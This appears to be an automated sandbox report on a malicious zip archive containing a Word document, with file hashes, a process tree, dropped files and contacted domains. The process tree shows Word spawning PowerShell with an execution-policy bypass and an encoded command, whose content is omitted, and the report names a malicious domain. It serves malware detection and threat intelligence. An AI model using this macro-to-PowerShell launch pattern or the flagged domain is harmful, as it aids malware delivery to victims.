| Field | Value |
|---|---|
| File name | Casasantachiara.zip |
| Full analysis | https://app.any.run/tasks/4d0f69a4-ced7-448e-9afd-7cd14ebdc4c1 |
| Verdict | Malicious activity |
| Analysis date | June 19, 2019, 13:22:43 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators | |
| MIME | application/zip |
| File info | Zip archive data, at least v2.0 to extract |
| MD5 | CD92571CA4C4C664152FF74112FE77E5 |
| SHA1 | 12DA6C89B461C738BCAE442350ABAEAAFB23880A |
| SHA256 | 4213DC430165E06BD8458CAA1601B684680BA3335012CF7A86034B309612C2B6 |
| SSDEEP | 768:10rD6P5E+UPzqDOArZ3IML6s2d1FIZ86vPg23yAM52z8gQ8+iRbuFxnxT3cuPyN4:arD6YrqD9rXL6s2d1F80AM52wiuFxnx7 |
| .zip | ZIP compressed archive (100) |
|---|---|
| ZipRequiredVersion | 20 |
| ZipBitFlag | 0x0009 |
| ZipCompression | Deflated |
| ZipModifyDate | 2019:06:18 06:02:07 |
| ZipCRC | 0x6b071cb8 |
| ZipCompressedSize | 48819 |
| ZipUncompressedSize | 77312 |
| ZipFileName | info_18.06.doc |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 2556 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Casasantachiara.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0 |
| 2864 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2556.8675\info_18.06.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 2560 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Exec Bypass -enc [encoded command omitted] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR769A.tmp.cvr | — | — | — |
| 2560 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1QEOT9HGKEVR15DP4GDC.temp | — | — | — |
| 2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 3CD1576AD04C09989593B478F1EA0418 | CCE93C13477B2BED5D8A6212C5B043E0D6FB67CEA5A8F4D927A6CE1F15C94804 |
| 2560 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
| 2864 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | CB7441065118C05CB2BEC3B25584F336 | 58D26DDE483E3AFD785EBF275F78B0E1B19D41753FF8A267F6C31004C3AD86C0 |
| 2560 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13806e.TMP | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
| 2864 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb2556.8675\~$fo_18.06.doc | pgc | 5AB7E5934B053FE65714E37274ED3286 | F71DE4D96F1737CD4879968FE8F75B27D26B8D412D5BC567123BA8184B2BB8F5 |
| 2556 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb2556.8675\info_18.06.doc | document | F5B5F4B4799C3B6E3EA1E48DBC55209A | 75D08136A8E3034288185D0A453773F43019D7FF792435AF42147280FD632AA8 |
| Domain | IP | Reputation |
|---|---|---|
| m6147keeganpw.info | | malicious |
| dns.msftncsi.com | | shared |